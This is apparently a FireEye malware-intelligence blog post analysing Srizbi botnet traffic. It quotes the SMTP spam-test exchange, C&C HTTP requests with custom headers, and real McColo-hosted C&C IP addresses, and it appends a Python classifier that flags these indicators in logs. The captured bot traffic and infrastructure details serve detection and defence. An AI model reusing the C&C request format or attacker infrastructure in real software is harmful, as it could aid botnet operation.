McColo hosting Srizbi C&C

We've written about McColo hosting the Srizbi Command and Control servers a couple of times, but today I saw a fun wrinkle that I haven't seen before.

After my machine got infected, it went through the standard connectivity test. The first test was the standard "can I send SPAM?" test that bots do, i.e., the outbound port 25 check. However, when I took a closer look at the SPAM test, the test domain is also hosted by McColo!

EHLO pur3.pwnag3.com
MAIL From:<a_fake_address@pickedbysrizbi.com>
RCPT To:<[blocked]@bestyounggirls.com>
DATA

Above you see Srizbi sending a blank message to [blocked]@bestyounggirls.com, and the IP it relayed it through was 208.72.168.85. A quick 'dig' of bestyounggirls.com (NSFW) shows that it also resolves to 208.72.168.85. The explanation is that Srizbi wanted to see if the botted machine had the ability to send SPAM, so it sent a SPAM message to a domain that was controlled by the group who runs the botnet. If the botted machine was not able to send SPAM, there's no need for it to try and possibly be detected by the systems administrator of its network.

After it does the SPAM test, you can see the normal Srizbi communication, again on a different McColo IP (I altered the headers to take away identifiable information).

POST /r/A1412B-12F1E6-A55215 HTTP/1.1
Host: 208.72.169.212
Content-Length: 22587
X-Flags: 1
X-TM: 8321062925
X-BI: JFINIO2532NEIS9080324FS902319
X-PH: 0
X-TI: 189048209184.526.5323.121.412.9

After the POST (in which the bot sends up a couple hundred K of data), it does a GET and exchanges more data.

GET /g/A9123B-98F13R1-A011N12 HTTP/1.1
Host: 208.72.169.212
X-Flags: 1
X-TM: 124908124
X-BI: DJK321N3091IOJOSF901FDS83923F
X-PH: 0

A quick Google search shows very little information for 208.72.169.212, despite the fact that it is hard-coded into Srizbi. No "fast flux" in use here! The last interesting wrinkle about this is that it is communicating over both UDP and TCP on port 18923.
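As an added example (not code from the original post or from FireEye), here is a small Python classifier that applies the indicators described above, the hard-coded C&C IP, the SPAM-test relay IP and EHLO name, the /r/ and /g/ request paths with their custom X- headers, and port 18923, to connection log lines. The log line format and the sample lines are constructed for this example; it generalizes the path check to the shape of the ID rather than the two exact IDs quoted above.

```python
import re
from typing import Dict, List

# Indicators taken from the captures above. Not a complete Srizbi signature,
# just the observable pieces this post documents.
CNC_IPS = {"208.72.169.212", "208.72.168.85"}   # hard-coded C&C, SPAM-test relay
CNC_PORT = 18923                                 # UDP/TCP side channel
BOT_EHLO = "pur3.pwnag3.com"                     # EHLO name used in the SPAM test
BOT_HEADERS = {"X-Flags", "X-TM", "X-BI", "X-PH", "X-TI"}
# /r/<id> (POST) and /g/<id> (GET): three dash-separated alphanumeric groups
CNC_PATH = re.compile(r"^/[rg]/[0-9A-Z]+-[0-9A-Z]+-[0-9A-Z]+$")


def classify(line: str) -> List[str]:
    """Return the reasons one log line looks like Srizbi traffic (empty if clean).

    Constructed line format: PROTO VERB DST_IP:DST_PORT DETAIL HEADERS
    DETAIL is a URI (HTTP), the EHLO name (SMTP) or '-'; HEADERS is a
    comma-separated list of request header names or '-'.
    """
    proto, verb, dst, detail, headers = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    reasons = []
    if dst_ip in CNC_IPS:
        reasons.append(f"destination {dst_ip} is a known Srizbi host")
    if int(dst_port) == CNC_PORT:
        reasons.append(f"{proto} to C&C side-channel port {CNC_PORT}")
    if proto == "HTTP" and CNC_PATH.match(detail):
        reasons.append(f"C&C-style request path {detail}")
    if proto == "HTTP" and len(BOT_HEADERS & set(headers.split(","))) >= 3:
        reasons.append("Srizbi custom X-TM/X-BI/X-PH headers")
    if proto == "SMTP" and verb == "EHLO" and detail == BOT_EHLO:
        reasons.append(f"SPAM-test EHLO name {BOT_EHLO}")
    return reasons


def scan(log: str) -> Dict[str, List[str]]:
    """Map each flagged log line to its reasons; clean lines are omitted."""
    return {ln: classify(ln) for ln in log.strip().splitlines() if classify(ln)}


# Constructed sample: five lines mirroring the captures above, two benign ones
# (192.0.2.0/24 is the TEST-NET range, so they cannot match a real host).
SAMPLE_LOG = """
HTTP POST 208.72.169.212:80 /r/A1412B-12F1E6-A55215 X-Flags,X-TM,X-BI,X-PH,X-TI
HTTP GET 208.72.169.212:80 /g/A9123B-98F13R1-A011N12 X-Flags,X-TM,X-BI,X-PH
SMTP EHLO 208.72.168.85:25 pur3.pwnag3.com -
TCP - 208.72.169.212:18923 - -
UDP - 208.72.169.212:18923 - -
HTTP GET 192.0.2.10:80 /index.html Host,Accept,User-Agent
SMTP EHLO 192.0.2.25:25 mail.example.net -
"""
```

Running `scan(SAMPLE_LOG)` flags the first five lines and leaves the two benign lines out; in practice the same checks would be fed from a proxy or SMTP relay log rather than the constructed strings.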

Alex Lanstein @ FireEye Malware Intelligence Labs

Comments/Questions to fgong@fireeye.com